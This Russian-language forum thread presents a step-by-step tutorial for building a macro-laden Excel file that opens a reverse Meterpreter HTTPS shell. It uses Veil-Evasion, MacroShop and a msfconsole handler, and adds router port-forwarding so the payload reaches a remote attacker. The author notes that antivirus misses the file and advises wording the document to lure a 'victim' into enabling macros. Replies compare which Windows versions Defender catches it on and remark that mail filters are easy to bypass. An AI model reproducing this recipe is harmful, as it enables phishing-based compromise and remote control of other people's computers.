Penetration Testing with Microsoft Office

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 13 окт 2016.

  1. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    807
    Симпатии:
    1.520
    Всем привет! В этой статье я покажу, как можно получить доступ к удаленному компьютеру, используя Veil Evasion и Microsoft Excel. А точнее одно свойство Excel – поддержка макросов.

    Макрос - это программа, которая содержит набор инструкций выполняющих какие либо действия, как автоматически, так и по требованию пользователя, т.е. выполняются явно и неявно. Широкое распространение, данное понятие получило благодаря корпорации Microsoft, которая реализовала возможность написания макросов в своих продуктах, а именно Office (Word, Excel, Access и т.д.). Используемый язык в макросах - Visual Basic, так же продукт Microsoft, но с некоторыми ограничениями. Макрокоманды, способны автоматизировать большинство процессов и значительно сократить время на обработку данных.

    Способ получения Veil Evasion описан тут - https://codeby.net/forum/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/

    Запускаем Veil Evasion:

    > ./Veil-Evasion.py

    Вводим команду:

    list (покажет список доступных пайлоадов)

    Penetration Testing with Microsoft Office

    Мы будем использовать пайлоад с ID 23. Вводим:

    > use powershell/meterpreter/rev_https

    или

    > use 23

    Обратный протокол HTTPS, здесь будет успешно использован, в случае если файрвол у жертвы настроен таким образом, чтобы пропускать трафик по TCP. В большинстве случаев, на компьютере HTTPS не заблокирован.

    Настроим Veil для нашего случая, пишем:

    > set LHOST 172.16.0.199

    Тут я немного прервусь, для объяснений, т.к. вопросы уже были.

    Так как, я нахожусь с атакуемым компьютером в одной подсети, мы подключены к одному роутеру, то в поле LHOST я вписываю свой локальный адрес.

    Penetration Testing with Microsoft Office

    Именно на него «постучится» цель, после того как на нем сработает полезная нагрузка. Чтобы таким же образом подключится к компьютеру находящемуся в другой сети, вообще в другом городе/стране, необходимо сделать иначе. Для удобства лучше иметь статический (белый) IP адрес. К примеру, у вас роутер, вашей машине, с которой вы атакуете, был присвоен локальный адрес из диапазона 192.168.0.ХХХ. Но, в интернет вы выходите из под своего внешнего адреса, который присвоил вашему роутеру провайдер. Ваш компьютер, с которого вы проводите проникновение, находится за NAT роутера.

    Penetration Testing with Microsoft Office

    Допустим этот адрес 82.198.34.88, для того, чтобы целевой компьютер постучался на него мы в поле LHOST его и укажем. В опциях так же есть поле LPORT:

    Penetration Testing with Microsoft Office

    Именно на этот LHOST и LPORT, будет пытаться подсоединиться цель. Затем необходимо указать роутеру, чтобы все пакеты, адресованные 8443 порту, он направлял нашей машине с Kali, у которой адрес 192.168.0.ХХХ. Для этого добавляем такое правило:

    Penetration Testing with Microsoft Office

    Теперь все пакеты, которые предназначаются 443 (у меня так) порту, получит моя Kali c локальным адресом 192.168.0.101. Идем далее.

    > generate

    Penetration Testing with Microsoft Office

    Вводим имя:

    Penetration Testing with Microsoft Office

    Veil-Evasion сгенерировала нам файл win8.1.bat в директории - /usr/share/veil-output/source/

    Penetration Testing with Microsoft Office

    Теперь откроем новое окно терминала и установим MacroShop. MacroShop представляет собой набор скриптов, помогающих в работе с пайлоадами, через Office Macros. Большинство из них, написаны на Python. Для его установки вводим:

    > git clone https://github.com/khr0x40sh/MacroShop

    Penetration Testing with Microsoft Office

    После установки, переместим файл win8.1 в директорию MacroShop.

    Penetration Testing with Microsoft Office

    Теперь, в терминале перейдем в директорию MacroShop, и пишем:

    > python macro_safe.py windus.bat file.txt (windus.bat – потому, что я его пересоздал)

    Penetration Testing with Microsoft Office

    После того, как процесс успешно завершился, откроем новый файл Excel (у себя) и проделаем следующее:

    Penetration Testing with Microsoft Office

    Пишем имя макроса и создаем его. В открывшееся поле для редактирования, копируем код, который мы получили в файле – file.txt, затем сохраним макрос.

    Penetration Testing with Microsoft Office

    Копируем код полностью, заменяя строки которые были в начале макроса, это важно!

    Сохраняем в формате, как на скриншоте:

    Penetration Testing with Microsoft Office

    В самом документе пишем все, что угодно, нам нужно заинтересовать цель в открытии документа и включения макроса.

    Penetration Testing with Microsoft Office

    Теперь, когда файл оказался на целевом компьютере, у себя в терминале откроем msfconsole

    Penetration Testing with Microsoft Office


    и введем следующие команды:

    > use multi/handler

    > set payload/windows/meterpreter/reverse_https

    > set LHOST 192.168.0.XXX

    > set LPORT XXX (ваш порт)

    > exploit

    Когда на целевом хосте буде открыт дынный файл и выполнится макрос, у вас откроется сессия meterpreter, как и было обещано.

    Penetration Testing with Microsoft Office

    Дальше дело техники. Спасибо за внимание.

    P.S. Антивирусы не определяют данный код как вредоносный.
     
    Dr.Lafa, Fi0d0r, Jmatis и 6 другим нравится это.
  2. z3RoTooL

    z3RoTooL Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    28 фев 2016
    Сообщения:
    490
    Симпатии:
    304
    Нормальная тема :) Дополню по традиции :)))))
     
    m0tion, Knife, xXx и 2 другим нравится это.
  3. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    807
    Симпатии:
    1.520
    Отличное видео! :)
     
    veterok и WebWare Team нравится это.
  4. z3RoTooL

    z3RoTooL Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    28 фев 2016
    Сообщения:
    490
    Симпатии:
    304
    главное, чтоб кроме нас ещё кто-то смотрел эти темы ))) а то никто не комментирует, молча заходят и всё.
     
  5. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Репутация:
    1
    Регистрация:
    7 сен 2016
    Сообщения:
    281
    Симпатии:
    245
    Хорошая статья...с этой тематики есть еще прога Magic unicorn Attack Vector. Мне даже кажется что она гораздо проще.Есть только одно но,с данным вектором атаки.Если забрасывать файл жертве через почту..то сейчас многие почтовые сервера выявляют макросы встроенные в (word,Excel, итд ) и не пропускают данные файлы, хотя эту защиту легко обходить. Ну и не следует забывать что бы вектор атаки был успешен, у жертвы должна быть включена опция отображать макросы.
     
  6. Inject0r

    Inject0r Well-Known Member
    Paid Access

    Репутация:
    0
    Регистрация:
    3 сен 2016
    Сообщения:
    82
    Симпатии:
    69
    Я смотрю. И на твой паблик подписался. И на ютуб ) По статистике обычно 60-80% людей - пассивные наблюдатели, тема им интересна, читают, но ничего не пишут, это нормально :)

    Кстати, почему после установки Veil Кали начинает глючить, после перезагрузки ввожу логин и пароль рабочие, но система не загружает рабочий стол, а заново выкидывает на экран с вводом логина. С проблемой месяца 2 назад столкнулся. Проблему решил только с помощбю снапшотов. Сохранил снапшот с установленным veil на виртуалке, а после работы откатываюсь к рабочему состоянию машины. Напрягает такая схема если честно.
     
  7. z3RoTooL

    z3RoTooL Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    28 фев 2016
    Сообщения:
    490
    Симпатии:
    304
    о_О
    У меня такого не было ни разу
     
  8. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    807
    Симпатии:
    1.520
    Никогда не сталкивался, вчера по новой ставил, все ок на 2016.2
     
  9. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    110
    Симпатии:
    27
    У меня банальный защитник виндовс, при сохранении файла с макросом, определяет его как вредонос, и тут же убивает. Думаю на компе жертвы будет также.

    Ставлю виртуалку Win XP поэксперементирую)))
     
  10. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    110
    Симпатии:
    27
    PS. Win XP SP3 Office 2003. Не работает.
     
  11. Hoasker

    Hoasker New Member

    Репутация:
    0
    Регистрация:
    21 июл 2016
    Сообщения:
    2
    Симпатии:
    0
    zavtra poprobyu
     
  12. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    110
    Симпатии:
    27
    Файлик windus.bat найти не может. Ты походу его не переместил в папку с программой, ну или имя файлу дал другое.
     
  13. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    110
    Симпатии:
    27
    PS2: Win 7 + Office 2010 Все работает))))
     
  14. z3RoTooL

    z3RoTooL Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    28 фев 2016
    Сообщения:
    490
    Симпатии:
    304
    у меня на форточке №7 тоже вроде работало всё
     
    Vander нравится это.
  15. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    807
    Симпатии:
    1.520
    Привет! Я на Win8.1 с защитником тестил, не определялся как вредонос...
     
  16. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    110
    Симпатии:
    27

    Пробуй так: set payload windows/meterpreter/reverse_https
     
  17. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    110
    Симпатии:
    27
    Добрый день, Vander.
    Подскажите пожалуйста, в Veli у вас LPORT указан 8443, а на роутере переадресация прописана на 443 порт. Или вы при создании payload, изменили порт на 443?
     
  18. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    807
    Симпатии:
    1.520
    Именно так
     
  19. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    16 авг 2016
    Сообщения:
    110
    Симпатии:
    27
    Проверил на Win 10 Home x32. не работает. Защитник убивает файлик с макросом. Во общем целится нужно на 7ку.
     
  20. Vander

    Vander Супер-модератор
    Команда форума Grey Team

    Репутация:
    3
    Регистрация:
    16 янв 2016
    Сообщения:
    807
    Симпатии:
    1.520
    А 8.1 к примеру не тестировали?
     
Загрузка...

Поделиться этой страницей